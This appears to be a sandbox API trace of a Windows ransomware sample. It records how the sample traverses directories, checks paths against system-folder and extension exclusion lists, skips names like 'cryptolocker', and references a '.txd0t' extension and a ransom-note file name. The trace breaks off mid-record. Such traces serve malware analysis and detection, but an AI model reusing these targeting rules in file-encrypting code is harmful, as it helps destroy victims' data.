[0077.229] StrCmpW (psz1="Windows10Upgrade", psz2="..") returned 1 [0077.229] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0077.229] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0077.229] StrNCatW (in: psz1="C:\\", psz2="Windows10Upgrade", cchMax=1030 | out: psz1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0077.229] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system32\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\local\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\boot\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\perflogs\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\programdata\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\drivers\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\wsus\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="crypt_detect") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="cryptolocker") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="ransomware") returned 0x0 [0077.230] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="C:\\WINDOWS") returned="C:\\Windows10Upgrade" [0077.230] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0077.230] FindClose (in: hFindFile=0xec20b0 | out: hFindFile=0xec20b0) returned 1 [0077.230] GetProcessHeap () returned 0xe30000 [0077.231] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec59c8 | out: hHeap=0xe30000) returned 1 Thread: id = 18 os_tid = 0x1030 [0085.222] GetProcessHeap () returned 0xe30000 [0085.222] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x486) returned 0xed39f8 [0085.222] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0085.222] StrNCatW (in: psz1="C:", psz2="\\*", cchMax=1030 | out: psz1="C:\\*") returned="C:\\*" [0085.222] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xec21b0 [0085.222] StrCmpW (psz1="$GetCurrent", psz2=".") returned -1 [0085.222] StrCmpW (psz1="$GetCurrent", psz2="..") returned -1 [0085.222] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0085.222] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0085.222] StrNCatW (in: psz1="C:\\", psz2="$GetCurrent", cchMax=1030 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system32\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\system\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\local\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\boot\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\perflogs\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\programdata\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\drivers\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\wsus\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="crypt_detect") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="cryptolocker") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="ransomware") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\WINDOWS") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.223] StrStrIW (lpFirst="C:\\$GetCurrent", lpSrch="C:\\Program Files") returned 0x0 [0085.223] GetProcessHeap () returned 0xe30000 [0085.223] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xed3e88 [0085.223] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0085.223] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\*", cchMax=1054 | out: psz1="C:\\$GetCurrent\\*") returned="C:\\$GetCurrent\\*" [0085.223] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0085.223] StrCmpW (psz1=".", psz2=".") returned 0 [0085.223] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.223] StrCmpW (psz1="..", psz2=".") returned 1 [0085.223] StrCmpW (psz1="..", psz2="..") returned 0 [0085.224] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0085.224] StrCmpW (psz1="Logs", psz2=".") returned 1 [0085.224] StrCmpW (psz1="Logs", psz2="..") returned 1 [0085.224] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0085.224] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0085.224] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="Logs", cchMax=1054 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\boot\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="crypt_detect") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="cryptolocker") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="ransomware") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.224] StrStrIW (lpFirst="C:\\$GetCurrent\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0085.224] GetProcessHeap () returned 0xe30000 [0085.224] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a8) returned 0xed76e0 [0085.224] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0085.224] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\*", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\*") returned="C:\\$GetCurrent\\Logs\\*" [0085.224] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0085.225] StrCmpW (psz1=".", psz2=".") returned 0 [0085.225] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.225] StrCmpW (psz1="..", psz2=".") returned 1 [0085.225] StrCmpW (psz1="..", psz2="..") returned 0 [0085.226] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0085.226] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=".") returned 1 [0085.226] StrCmpW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="..") returned 1 [0085.226] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0085.226] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0085.226] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="downlevel_2017_09_07_02_02_39_766.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0085.226] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log") returned=".log" [0085.226] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="bootsect.bak") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="iconcache.db") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="thumbs.db") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=" ransomware ") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2=" ransom ") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="debug.txt") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="boot.ini") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="desktop.ini") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="autorun.inf") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntuser.dat") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntldr") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="ntdetect.com") returned -1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="bootfont.bin") returned 1 [0085.226] StrCmpIW (psz1="downlevel_2017_09_07_02_02_39_766.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.226] PathFindExtensionW (pszPath="downlevel_2017_09_07_02_02_39_766.log") returned=".log" [0085.226] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0085.226] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.226] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.226] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", cchMax=32000 | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0085.226] SetEvent (hEvent=0x3fc) returned 1 [0085.227] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0085.228] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=".") returned 1 [0085.228] StrCmpW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="..") returned 1 [0085.228] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0085.228] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0085.228] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="oobe_2017_09_07_03_08_57_737.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0085.228] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log") returned=".log" [0085.230] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="bootsect.bak") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="iconcache.db") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="thumbs.db") returned -1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=" ransomware ") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2=" ransom ") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="debug.txt") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="boot.ini") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="desktop.ini") returned 1 [0085.230] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="autorun.inf") returned 1 [0085.231] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntuser.dat") returned 1 [0085.231] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntldr") returned 1 [0085.231] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="ntdetect.com") returned 1 [0085.232] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="bootfont.bin") returned 1 [0085.232] StrCmpIW (psz1="oobe_2017_09_07_03_08_57_737.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.232] PathFindExtensionW (pszPath="oobe_2017_09_07_03_08_57_737.log") returned=".log" [0085.234] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0085.234] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.234] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.234] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchMax=32000 | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0085.234] SetEvent (hEvent=0x408) returned 1 [0085.235] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0085.235] StrCmpW (psz1="PartnerSetupCompleteResult.log", psz2=".") returned 1 [0085.235] StrCmpW (psz1="PartnerSetupCompleteResult.log", psz2="..") returned 1 [0085.235] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0085.235] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0085.237] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="PartnerSetupCompleteResult.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0085.237] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log") returned=".log" [0085.237] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="bootsect.bak") returned 1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="iconcache.db") returned 1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="thumbs.db") returned -1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2=" ransomware ") returned 1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2=" ransom ") returned 1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="debug.txt") returned 1 [0085.237] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="boot.ini") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="desktop.ini") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="autorun.inf") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntuser.dat") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntldr") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntdetect.com") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="bootfont.bin") returned 1 [0085.239] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.239] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log") returned=".log" [0085.239] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0085.239] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.239] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.239] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchMax=32000 | out: psz1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0085.239] SetEvent (hEvent=0x410) returned 1 [0085.242] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0085.245] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0085.252] GetProcessHeap () returned 0xe30000 [0085.252] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.252] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, 